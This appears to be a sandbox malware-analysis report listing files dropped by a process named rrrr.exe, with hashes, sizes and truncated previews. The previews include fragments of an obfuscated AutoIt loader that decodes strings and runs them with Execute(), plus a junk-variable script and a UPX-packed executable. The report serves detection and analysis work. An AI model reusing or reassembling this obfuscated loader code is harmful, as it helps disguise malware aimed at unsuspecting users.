                                                                                                                        SHA-512:4A18CEAA811559854E898C4ECDC6D982CEB4E22540E64E814FA956A463CEE8CB9F727C9A24B5A208DB3ADCF37E83B4B7348505C3E738F339C450C2A8F1156EB9
                                                                                                                        Malicious:false
                                                                                                                        Preview:...g.u...U..Y.N..F......~7.B.j....O...Y.......F..F....u.j.X........P.F..Y...Y....P...b....F.@P.u..6.R......^]...U..VW.}.....Q..A...t..B...t..P.;.u...;N.u..V.Q.}....'..N._^]...U..QQSW....3.E.QQ.x.QQGW.0QQ....I..E...u.........3VP....Y3...E.QQ.u.VW.0QQ....I.HPQV...X...V....Y^_[..U..E.Pj..u..u..u........p....Q.S.......y....].U..E..@....y..u.........u.V.u.........&..F.....^3.]...U......DS.].V...W.t$.....3.3.G..P.{..D$...p.I.;.u...t.I..D$ P..l.I..]..d$(..d$,.j.Xf.D$ .C......................tq.....j....C..p....|P...F....D$..C..p....fP...F....E..@..p....QP...F..8.E..@..0...=P...u..t$.S.F..L$.W.0..........C..H..L$..9v................~6.C........H....;..!.C..H.....L$........D.....D$....d$..j<.....S.Yj).D$ .r....kv....t.3....O...F..S.....2...O...t$..F..L$ S.0..;...D$(.@...x&.M..D$ P.....d$H..L$@P.!...j.3.^......d$8.3..|$<j.......0O...L$..A....E..@..p.....O...F..8.E..@..0....O...u..F.j.S.\$...W.0.d........C..p.....N...F..8.C..0....N...u.j.j.....j<....Y.K....1...N...N.3.

                                                                                                                        C:\Users\user\AppData\Local\Temp\SETUP_44067\00001#Bosnia

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\rrrr.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):110592
                                                                                                                        Entropy (8bit):6.262208423559642
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:Izy9pl/VxpYjay5SzsP1zCJnIgOyK108GL3TFJ7k:iy9p1pX8Sz4yK1yrk
                                                                                                                        MD5:E334DF859253C2E76D76FCD60E6D21F2
                                                                                                                        SHA1:5FAB4038C6019417CEC266CC189ADB34B7E23690
                                                                                                                        SHA-256:8CE58CF830BCD28E13F9B3B92D67B3474012066E21B81D5C71A82FF3095DCF2A
                                                                                                                        SHA-512:E645F16327B29801FD8446EC09DA74E7434E89463516FEB7E71418A371C51AD0C5F014918BC1B25462141E4D2BC3ADD2439A88E2E3F7271858727E0E60F97A9F
                                                                                                                        Malicious:false
                                                                                                                        Preview:cruzVehicleRespectiveDiane........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L....q.b.........."...............................@..................................i....@...@.......@.........................|....P..P............N..X&...0..hv...........................C..........@............................................text.............................. ..`.rdata..............................@..@.data...tp.......H..................@....rsrc...P....P......................@..@.reloc..hv...0...x..................@..B......................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Temp\SETUP_44067\00002#Brooks

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\rrrr.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):58368
                                                                                                                        Entropy (8bit):6.621477277628822
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:aiuOQ/cnFdnIj5Pd4PIagKaTwSx+aPh/e73H5AtgI:xuN/ebIj5Z6bH4GLHatgI
                                                                                                                        MD5:C80856E2B89EB077180E27E799589826
                                                                                                                        SHA1:472E00E8DE6CB0CDD07DD501AA1597EC55D2EB15
                                                                                                                        SHA-256:25C36C2E3A9238E92E7D50BBBA35F661AD04524D3A6DBF43AAABC72D88D4F787
                                                                                                                        SHA-512:213B76CB93AA0F3CA67AEB8DC63D332F76EED45FF3A58B4D3139D0B72F8E5CD160160BD16221C0AF1DE3DA2E2CBCE7F3A2154A403F7C67B50D3934D8978DA6E3
                                                                                                                        Malicious:false
                                                                                                                        Preview:....Vj..H(^.y...L.t.....t.....y..t..Q...t..........u........Z...Y^].j.h..L..z-...e...P......@.L...P...t..wL..uCj..R..Y.e...5..M..GLP.0...YY...u..E............u..K...u.j..R..Y...V-....U..V.u.W..t<.E...t5.8;.u....-V.0....Y..t.W.........Yu....L.t.W.....Y..3._^]..U..M.3....t......SVW........t......t.........t.........t.................t........#.t.;.t.;.t.;.u...`......@...... ......._#.^[......t.......t.;.u......]..@]..@...]..U.....}...=4.M........f.E.3..W......?t)..t.j.Z..t......t......t..... t......t.....]..E.....E...U.E..?t)..t.j.Y..t......t......t..... t......t......_.=f.M.3...?t2...t.j.X...t.......t.......t...... t.......t........]..U......}.f.E.3..t.j.Y..t......t......t..... t......t.......SV.........W.....#.t&......t.......t.;.u.........................t.;.u....................f..t........}....E...#.#...;.......V.?...Yf.E..m...}.f.E.3...t.j.^..t......t......t..... t......t...........#.t*......t.......t.;.u.............................t.......u................

                                                                                                                        C:\Users\user\AppData\Local\Temp\SETUP_44067\00003#Bs

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\rrrr.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):39936
                                                                                                                        Entropy (8bit):6.6505271873552285
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:7JXoHpMZoKR8RFj5OgEY3zvx5eWzjGa0hGgQCFCojNSXFp:toHpER8RRDTvx596dQCFPja
                                                                                                                        MD5:A592106A23682C9F456959581E555E57
                                                                                                                        SHA1:CDAE6FF10CD8BE861601ABBC5A80ECF6A548AB11
                                                                                                                        SHA-256:A3F12FD6F932A730A1E55FDB0088663770BDAFA71923B5F7A0F30C572122BFF8
                                                                                                                        SHA-512:4838A14984A1D84B28655611A57EE8701AF4A613B084A431419E3B3A96E66452D580C55309CAA5C5F5F684D7862719BFE49637E2CD5CACD3916E706F7C5B06A0
                                                                                                                        Malicious:false
                                                                                                                        Preview:E.Y..u..}..G0.......]...3.......H..-....E...G....C.....C..0...K........u0....t3........f;.r7.............L.........E.,K..<...K.........f;...~0......,.......f;...h0...K. ._0........0...b0...............L.........E.,K..<...K...m0.......f;...a0....,..........f;...K0........C..>0...K......./.......t0...E...U....{....\$X.^@.]8..0..j|_f.8.x.3..|$Lf......G..L$..|$ .D$4..0...L$<.D$D.T$H..x);.u.9T$8t..\$...y..\$8.\$$.L$.....L$<..y...x..L$,..y...T$0.L$,...L$,.T$0.\$...3.....u.9T$$u...T$$.\$....L$...T$..D$..0..3....Q3.f..VQC..#..i..........u..^t.0....xc;NH~..NH.D$Lf...0...}8..L$.t..D$T....L$....D$\..jwXf.....+D$...f.G..B..T$..|$t.T$`....\$(.]8./.....u.j$X..3.......H..-....M....U..D$(..3..0...t$d3.f...D$ ...V...Pj.Z......L$L.....+....PQ.A.P.....T$L......L$....f...G.+......f.B.jxZf.W.f.G.....F$....0...E........{.....3..u..E.....]..93....U..a3..3.]....M.M......3....x.....t..},.u.+w...f+p.f.p..u.3...x....E..@...._...jvXf........B...x...f..+w.j.Y....3.P.f.0f.H..u..U..h1.........M.

                                                                                                                        C:\Users\user\AppData\Local\Temp\SETUP_44067\00004#Dat

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\rrrr.exe
                                                                                                                        File Type:ASCII text, with very long lines (1201), with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1200656
                                                                                                                        Entropy (8bit):4.910402027337674
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24576:qz3Hvz3jQRsf4XhpdPhrdizsZ6UyI0oFStI0o+hoz3XI0oacqBuBlB9I0ob+zkzk:9XG
                                                                                                                        MD5:C8683A7147F3E27D0F25049ECC369187
                                                                                                                        SHA1:A73B0857331C68F848B5AB8F7C26C6B489CDAE91
                                                                                                                        SHA-256:0FF45C0A72455B1C1BCB1B301FED0E18D9E0E5B30CAD578B56EE033C336494A4
                                                                                                                        SHA-512:0C4CEBB6ED51A35E3C25348B0B33D63709B8A8BE4960712C5F6F015E1D64DA099BDA327BA66FD36BE3176509226ACEFF469ADE815A06FD385791675E6B04E39B
                                                                                                                        Malicious:false
                                                                                                                        Preview:$indicationprogressivesalarydrivingcultures = 301768..$ContestsReliableImpacts = 69..While 9727982..Switch $indicationprogressivesalarydrivingcultures..Case 301767..IsObj(SistersScuba("109d121d115d116d101d114d105d111d117d115d94d68d97d117d103d104d116d101d114d115d94d84d101d97d109d94",0))..Random(101, 949, 0)..Abs(8332309)..Execute(SistersScuba("87d117d118d120d44d58d58d54d53d58d58d53d45",4))..Execute(SistersScuba("73d119d110d123d106d76d106d121d88d106d119d110d102d113d45d44d92d107d118d89d107d109d89d95d90d82d112d80d106d78d115d115d109d44d46",5))..$indicationprogressivesalarydrivingcultures = $indicationprogressivesalarydrivingcultures + 1..Case 301768..Opt(SistersScuba("89d119d102d126d78d104d116d115d77d110d105d106",5), 1)..ExitLoop..Case 301769..Sqrt(1047779)..IsObj(SistersScuba("100d115d102d101d106d117d116d33d33d33d33d85d102d111d33d33d33d33d79d112d110d106d111d98d117d106d112d111d33d33d33d33",1))..$indicationprogressivesalarydrivingcultures = $indicationprogressivesalarydrivingcultures + 1..En

                                                                                                                        C:\Users\user\AppData\Local\Temp\SETUP_44067\00005#Delegation

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\rrrr.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4096
                                                                                                                        Entropy (8bit):6.076710803132604
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:cMykUJEh7VmDcaO4VKoCRLVcZVJRBVGqoVg5gzkqHvAAr7DeaZFa:cMMDcP8mrRrWaG
                                                                                                                        MD5:7FA71A3B5C58C81C536ADDA3CB9A462C
                                                                                                                        SHA1:F69D42FE8D8D28AEB148B95C3BFA86AE33D289D7
                                                                                                                        SHA-256:F31694E132632CC1B79154EFA8A4D7581D3A9B56D3F90396C5C54D4A65BE947F
                                                                                                                        SHA-512:88CBC24B990E9FA9342F2DE30D9E37D0900DB2815AD6A99420A65ED6FB6F5BDFF16BFB79006D406902B8BCA9F1F2D4FDF9A4B59F89F2A24AE126EDA492D9DB2D
                                                                                                                        Malicious:false
                                                                                                                        Preview:.A.M.;.~.......}......;.......;~|......................FD...........M...B.}.;.~............:...$.G.E..}..E...............N|;........V...t..F.j.PQ............./....,.V....+.;.w f..f;F4u..........f.G.f;F6.............t1.G.;F|r).~..u#.~..u.f..f;F4u..Fh..............9...E....M.@.}..E.;...U.........F|..}.+.;.v@.............;............Fh.............o....H9...F|..}.+.;.w....M.}......}......;........N|;.s........}....w't....t?.............';.s-f.?.u'....}...=....t................~l.......B;U.~..)....}......9M.......;~|..#..........}.=....w4......=....w.................. .......D=......}....7=_ ..w%..n...=. ..r#=. ....\...=/ ....Q.....=.0....D...A;M...r....M......}......9M...'...;~|..|..........}.=....w(tY=....w.tP...tK.. .......@=...........3=_ ..w!t*=. ........=. ..v.=/ ..........=.0........A;M.~..M.......}......9M.......;~|.............}.=....w...o......r......a.....=( ..r.=) ....M...A;M.~..M......}......9M...4...;~|.............}.=....w.t.............................A;M.~.M..?.

                                                                                                                        C:\Users\user\AppData\Local\Temp\SETUP_44067\00006#Furthermore

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\rrrr.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):137216
                                                                                                                        Entropy (8bit):5.735232870270804
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:uibD8anHsWccd0vtmgMbFuz08QuklMBNIi9uLaAwuaP6:V38QLeAg0Fuz08XvBNbSaAtaP6
                                                                                                                        MD5:5E999830BA1A0373F7DB208859FF3A4C
                                                                                                                        SHA1:0CA6D5C90590C77360569573FE30A47624C5133B
                                                                                                                        SHA-256:35F27FF81D731687B932B136C9654DB8F734082FC25613453D03C940D11031C1
                                                                                                                        SHA-512:B430221E13A1EC690DF3F2C43611835F168CC0511E64D7116AB9A40BBD380CCD755090511034AEA15BEBB3058BB127709A2D396851D41148E65B3FFEFC6D43F9
                                                                                                                        Malicious:false
                                                                                                                        Preview:H.I.D.E...P.R.O.C.E.S.S.L.I.S.T...W.I.N.G.E.T.S.T.A.T.E...S.T.R.I.N.G.U.P.P.E.R...P.R.O.G.R.E.S.S.O.F.F...F.I.L.E.G.E.T.S.I.Z.E...S.E.T.E.X.T.E.N.D.E.D...W.I.N.S.E.T.O.N.T.O.P...W.I.N.S.E.T.S.T.A.T.E...T.R.A.Y.S.E.T.I.C.O.N...G.U.I.S.E.T.C.O.O.R.D...W.I.N.S.E.T.T.I.T.L.E...S.T.R.I.N.G.L.O.W.E.R...I.S.D.L.L.S.T.R.U.C.T...S.T.R.I.N.G.R.I.G.H.T...M.E.M.G.E.T.S.T.A.T.S...G.U.I.C.T.R.L.R.E.A.D...U.D.P.S.H.U.T.D.O.W.N...D.R.I.V.E.S.T.A.T.U.S...W.I.N.G.E.T.T.I.T.L.E...S.T.R.I.N.G.I.N.S.T.R...F.T.P.S.E.T.P.R.O.X.Y...F.I.L.E.D.E.L.E.T.E.....V.A.R.G.E.T.T.Y.P.E.....T.C.P.S.T.A.R.T.U.P.....F.I.L.E.S.E.T.P.O.S.....F.I.L.E.E.X.I.S.T.S.....S.T.D.I.O.C.L.O.S.E.....P.R.O.G.R.E.S.S.O.N.....F.I.L.E.S.E.T.E.N.D.....R.E.G.E.N.U.M.K.E.Y.....D.I.R.G.E.T.S.I.Z.E.....R.E.G.E.N.U.M.V.A.L.....S.T.D.I.N.W.R.I.T.E.....G.U.I.S.E.T.H.E.L.P.....F.I.L.E.G.E.T.P.O.S.....I.S.D.E.C.L.A.R.E.D.....T.C.P.C.O.N.N.E.C.T.....B.L.O.C.K.I.N.P.U.T.....S.T.D.E.R.R.R.E.A.D.....W.I.N.G.E.T.T.E.X.T.....M.O.U.S.E.W.H.E.E.L.....G.U.I.

                                                                                                                        C:\Users\user\AppData\Local\Temp\SETUP_44067\00007#Highlights

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\rrrr.exe
                                                                                                                        File Type:ASCII text, with very long lines (1704), with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):14948
                                                                                                                        Entropy (8bit):5.791308193778568
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:jmO56scI1GxSLtyfNFKk+AY3jI4LHRCW0ArKI4LgRCW0ArvdH+hUHX18wsuaiZeQ:fYxqH3
                                                                                                                        MD5:01AB43C82FE07A5AB4842D0A311C7A2E
                                                                                                                        SHA1:CACB2006AC19B30D7B6005EDF46C617C68632B12
                                                                                                                        SHA-256:F77EE5A49CE6092F5027B9E7A7D4036DBC6021519323B737A2BD515117750197
                                                                                                                        SHA-512:04032F44433CCE9311CDBAFBF79B1FF9A329AE7871B15A1FA53A4E0926C4CD5F822C3B4F66FAAE6C9B8403B329724E777E1A28D06D647F058F7B8EB2318AD7BB
                                                                                                                        Malicious:false
                                                                                                                        Preview:Set AXblGwibaCngTujDOJiFzXSoldAUJFAlK=y..pFuUpaIdEr=bBXAvoDZOCyfqfAjNN..hEpyeXHOXh=HhyPTZXopsGKVmrduEJuUDDP..hcUDPzGMrVSpkvAfFEJGThFYGB=guQrKfYFDeFzY..YSDkiVioQf=ToXqPVXhpaFjRiUjRWjqlLGVxeMmG..ydBtRuwENi=uPIaFMtjIdkEgPiCwFNobHu..fKNdNkjptatWYC=fIjXLULjfJEZYZYlnIvrUYNnb..emWKkDmQnml=xsEnnGpjhpuoGhCnTdUOAHS..dEnqmiBnZNhtmv=iglQTzOtXwqXiFvpNmai..opMyHHoSqbZbPNmfRZSBmAYnlxT=DAEugHYynKkLFjXDwmsRX..Set WAAGzHlhUjOGgmTSooOzRuNuWhCxbLrwFJDtGIhsVkPZXZX=v..osorDrPNzJyyPPppMqEVOjmV=nGdNpWdtKfzUYeGOdjY..kycGQlYaBVVSh=tbmZlNPqyAQgNYYibqANkz..KXYYYCOzAHzYpg=wkakqUPBbqxxbVsA..KjOejPRbdufGxZOTu=gxZzdUcBXDodbpuZgXmgPvBOJNmVe..FAsXryxsWU=KRhgqIuAcLRzSoSTkKCxAm..YHZAuqEWwFHtFgmItzcGfNimOkjo=zmukVgGwoqmQOQNlrjFLwb..ySGlAAMVOv=HuBTJZSHWzWQBXzg..Set YHvFWbwzftuAvyKxnoHJlDGSzAIpeyjukwWuZKKImAxU=e..AhkcePMFAxwE=cPSslRqfcoExOb..pKpLuhZxYGebzGACtcnfTHpleLRyy=wgsOcQkdbYvcTKixGIUFAZ..oyCBZIxvUgsFOuF=JsNXASbNneIyol..ywYoJTfjHeBBiCyzgwb=gMwOfHOeWqfgJO..DPXVszyuVYsdka=xrKZkzqpSwtjfGNhRafCDdy..RpGuPYsDKjGk=KDSDGtUhiP

                                                                                                                        C:\Users\user\AppData\Local\Temp\SETUP_44067\00008#Reception

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\rrrr.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):133120
                                                                                                                        Entropy (8bit):6.626963923213231
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:jdv+Z/2UDjpNvatQaw10UZhO6EZZyvs6Df9xris9kMmZiO:jdv+Z/fDldZhO6wyvs6RBis9kMU
                                                                                                                        MD5:6393C306F3BDC74E0639F41E3FF27C52
                                                                                                                        SHA1:5D6B3E68C43F8D4562EEB8D6752C81FCB05F5F3D
                                                                                                                        SHA-256:91177517545989425F711D8AA64752DF35998EA2642453373FCB2809B82433DB
                                                                                                                        SHA-512:44AC619FBDAACA305AD0A493438F70137E8BF38F6E5D410575D5BF65E8349B9E0F8546C47E1D8C48FF3834C6F35D9A05EEB00F03730509F600337D810673D5DD
                                                                                                                        Malicious:false
                                                                                                                        Preview:....b...6.^2...}.Y.E..}..t.;.tB.M..E.PW.....j..u..u..v..6.......t..E.Wj.h.....0..H.I.....t..E.C.M......._^[....U..SVj...j.h.....6..H.I....u.2....M.h..I..0P..Q.u..u.Sj.j.h.....6..H.I.P...a...^[]...U..QV..M.h..I...O...u..........u.2....u...P.....^Y]...U......SV...X...W......3j(......3..X.....h.........M...j(V.E.M.P..X....E......E......}..z...Vj.h>....3..H.I.....X...h......X...PW.......t.....X........I.3.M.P.)O....X....<..._^..[....U..V.u....+.....t.h....Ph'....6..H.I....H^]...U..QSW.u...........t(Sj.h.....7..H.I.Sj.h.....7..H.I...t.....2._[Y]...U..QV3.W.....u..E.Ph....j.VVVW..X.I...t.j...VVW..h.I.P....I.P..l.I._^..W..Q..;.t.P....I...u._.3.@_.U..S.].VW.}.9...*....u...h..I...N.....E.Q......j:Y...f;.t1j;Yf;.t)j]Yf;.t!..;.w..A.Q.M............P..u.....I....n..............h....v..6....I..7.M.V.L...j:Z...f;.t.j;Yf;.t.j]Yf;.......f;.u..F....M.h..I..jM...D.M.V......M.....E..F.P.E.......M.j;Z...f;.u.f;.u.......u.Q.M..7.-u...7;.v...F.7.M.V......... t...t....2._^[]...U.......SW..

                                                                                                                        C:\Users\user\AppData\Local\Temp\SETUP_44067\00009#Sbjct

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\rrrr.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):50176
                                                                                                                        Entropy (8bit):6.580938414966878
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:8BZVuB/VqwUUyK3TGcAcVUB5Cn6deYTCRv6Dj7QPAx3xv6llEAoi:8BE/VDKC7YORv+j6+3xtAr
                                                                                                                        MD5:C7228ABD722E71E6B51318AF66AFD1BB
                                                                                                                        SHA1:2F017C9479A5C5CEB2AD78EE890B6C9842970B96
                                                                                                                        SHA-256:135755FB74460EA4117B4032603BC8AB153B33A5D6677887956E987140C3DBD5
                                                                                                                        SHA-512:47C0C53E17B554A55B16FED2C5E6386B9D3CF4DC6D2A7A16CA6A5676CE309EE9CA253A15C14026DEFB778AC00B41649B14E62ADA291DFF95BA0DDDF1B607CA28
                                                                                                                        Malicious:false
                                                                                                                        Preview:}.9E...................}.............Q*...$...E.;M........F|.E.;........V...t..u.N.QP............t4......N..U...+.;.w f..f;F4u..........f.G.f;F6.............t1.G.;F|r).~..u#.~..u.f..f;F4u..Fh..............)...F|....}..E.;.s.f.......f#......f;..E.u.....}..M.A.M.;M.../....%.......t.;.....v..Fh.............z)...U..}....O...;...`....E...@..P.u.V.u..u.................f.G..........}.f#......f;.u.....}...}...E.u.;.v.f.?.u.f....u..y..}.;.w.......E.=....}N;...j....N|.E.;.sB....}.;.s$f...E.....f#E..E.....f;E.E.u.....}.@.E.;E.|..$....~|.}..............;............Fh..................c(..)M.N|..+...9E.v7..........}.......;............Fh...................(...E.<G.}.....;M........F|;...Z.............%....=....u...G.......%......................u..F|....}.;...4...f.?.uC....;...t0.~l..........t!...t.......t...( ..t...) .........F|.<W.}..M.A.M.;M...T........;M............;~|...........%....=....u...G.......%.........................wTt.......w@t....t... uj......u.3..}.....;...X....E.<W@.}

                                                                                                                        C:\Users\user\AppData\Local\Temp\SETUP_44067\00010#Seminars

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\rrrr.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):160882
                                                                                                                        Entropy (8bit):5.966232770435887
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:K6lLxjgarB/YaCDWy4ZNozSqzvvc0f/Y/P0z:K6/garZkaBZ2zSq8Uz
                                                                                                                        MD5:EC94F6C7132A0E8FE98300F75634786C
                                                                                                                        SHA1:04BD5AA9B4D011D960D7288251D8D2719BFB1336
                                                                                                                        SHA-256:985CBC7FA88E97FBAD57BDBFC6F62320D945CE778B3C5F5566577E042CCFDD37
                                                                                                                        SHA-512:EF18FA4B22367745FD584BF7DE5EC5B7A815EEF920328667CCF40E38D47499B315A8532D11B88F3060219E76B4C2D810D55E3E8C23A499F73D62D8643089A7C6
                                                                                                                        Malicious:false
                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Temp\SETUP_44067\00011#Speaking

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\rrrr.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):140288
                                                                                                                        Entropy (8bit):6.711770545676298
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:Y7z835PzpOXeFIqvhGGsC4c83/nOJUDylSgpRuDJXG:Y7w3hpOXeio1L8/8L8gnuDJXG
                                                                                                                        MD5:96B7B9D3FCAC304F1F4BE0931C1A5B83
                                                                                                                        SHA1:E8C273C12FADD1277E5F5C5C8FB0F03C84449995
                                                                                                                        SHA-256:7C53943B69FEF395214474DED7856F2DD10D71D2DC84FA44B5A7795539793955
                                                                                                                        SHA-512:98DDACD637EE3A55A95D263AADA70ECD3BC130B28FFE234F7611B6CC1E94A3BE9AA67842DF242ACF175DDC65A1280FBF47B8D6A57A54B13B511904DB82B0BD82
                                                                                                                        Malicious:false
                                                                                                                        Preview:u....F....F.....^]...U....SVW.}...3.j.A.G.[.M..@.f9X...b......e....d....;.........m.....h.............:.t...uY..:.t...uS..:.........uI..]...;Z.~L..u>..;Z..A.U.B.U...u1.M...d....@...;...T..._^[.....P0.P0.P0.P0.@0..j.h.....F...U..Q...SVW.13.....M.x>..>.+....S..s...0.u....YY..x.~..{..M.;.~.;....._^[.....s.......V..~..t..~..Wu..~.........F.._.N.^.N..y...t.Q......~..F....V....(..j.V..C..YY..^...U..V..W.F...........}.S..........j.[9_...@..........@.......[.N.....@..._..^]...U..QSVW...G...................u?.u..~....[...j.Y9N..........6.........../...O..........._^[.......................M...U..QQV..~..t........]...'...E....F.....^..U....SVW..M.h..I..)....u..F....x........j8.B......$.....'...B..Y..G.....O..=.........F..0.......v....l..........PV.G(.Z.......R.......................G(........E..x...........>.....U.+w...u......V.........M.....E...P.E.P.W............M..E.P......j..u..H....&....M......E..@....x..u........t.Q...p..._^3.[....U..A,...t<...t7..

                                                                                                                        C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exe

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\rrrr.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):664720
                                                                                                                        Entropy (8bit):6.910464529620094
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:Zgd3wABNwNomG8Ty4+k7VBBWVOuoSJ/8RvaXCzat:md1FOMV7//
                                                                                                                        MD5:8F234EB6FAF146795C790D8191A0DC1F
                                                                                                                        SHA1:7A1ED6414168CAD511DEF640A7C1A713D225C769
                                                                                                                        SHA-256:B778CFAFE8A23F7F1FDC31B3F1548D35BECC6B11D65CD871E277D3C7288588AD
                                                                                                                        SHA-512:041DD47A9C23991F4DB67F9CC4CC5B0FC7EFE637ECDD8922BEED09628C4301779EDE07A4DA842D8146387B91C83078B07B487D7103B9F7398403C26A5C1EF8C1
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................P...p.. 9.......P....@..............................................@..........................t...0....P..tD...................................................D......................................................UPX0.....p..............................UPX1................................@....rsrc....P...P...H..................@..............................................................................................................................................................................................................................................................................................................................................................................4.00.UPX!....

                                                                                                                        C:\Users\user\AppData\Local\Temp\SETUP_44067\Modern_Icon.bmp

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\rrrr.exe
                                                                                                                        File Type:PC bitmap, Windows 3.x format, 52 x 52 x 24, image size 8112, cbSize 8166, bits offset 54
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8166
                                                                                                                        Entropy (8bit):1.581374875516457
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:kuOEpgk1kZvHePyPreScVF+1/LVgoTuDsdimu61uOXfSd/aOeO0O3a8yZKq0l:j
                                                                                                                        MD5:1DD88F67F029710D5C5858A6293A93F1
                                                                                                                        SHA1:3E5EF66613415FE9467B2A24CCC27D8F997E7DF6
                                                                                                                        SHA-256:B5DAD33CEB6EB1AC2A05FBDA76E29A73038403939218A88367925C3A20C05532
                                                                                                                        SHA-512:7071FD64038E0058C8C586C63C62677C0CA403768100F90323CF9C0BC7B7FCB538391E6F3606BD7970B8769445606ADA47ADCDCFC1E991E25CAF272A13E10C94
                                                                                                                        Malicious:false
                                                                                                                        Preview:BM........6...(...4...4.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Temp\SETUP_44067\Modern_Setup.bmp

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\rrrr.exe
                                                                                                                        File Type:PC bitmap, Windows 3.x format, 162 x 313 x 24, image size 152744, cbSize 152798, bits offset 54
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):152798
                                                                                                                        Entropy (8bit):1.0132857037503142
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:GGqEFgk1kZTLevOPrKSchF61/LVsATuD4diuuq9uCXHCN/KCaOwO3GsC9+6Un:7
                                                                                                                        MD5:DED1D8DB477CC655B17E16C6FE989707
                                                                                                                        SHA1:E48613ED98876B022460F629971C941AD3100F78
                                                                                                                        SHA-256:7A5D14D64EF24CDF895F947700F6E8444940C3CF5B23E868F2B3A14F0FE14206
                                                                                                                        SHA-512:3EFC3D0D2BCE3F5B2C9D74D1E5DEE275E6BC8098E4E805AD67C57E3567C888FCD5865CEE517F52419A8DD587383D51C385647873FBD025A0781E4371DBA60BE2
                                                                                                                        Malicious:false
                                                                                                                        Preview:BM.T......6...(.......9............T....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Temp\SETUP_44067\Reuters.qsp

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\rrrr.exe
                                                                                                                        File Type:Microsoft Windows Autorun file
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):7479
                                                                                                                        Entropy (8bit):5.399339959689641
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:FhUEugBO8dLgottSEn5e6Y12oDuDvXO+99SAvdZi43c4lAiSg5d0COqCmXc:jXn5e6YovBv35txlc
                                                                                                                        MD5:00BEE7A1B915D3992AE39656C79FE05D
                                                                                                                        SHA1:72414C9A0D7AAC7D6F550BB4F58D22A0F127B955
                                                                                                                        SHA-256:04939367AAE434DBD13DEFEE2AB8D501EFB8101625533AD8D7F494724EE3B6D6
                                                                                                                        SHA-512:7445A8ED09ECE0A07019AF4D95537362B87ED28535D029F9E9109BE5190E9F72FBBC9DE23B6B9DD92E7CDE5C12DC8C4595CB3DA5A866075BBB4956B22A805C14
                                                                                                                        Malicious:false
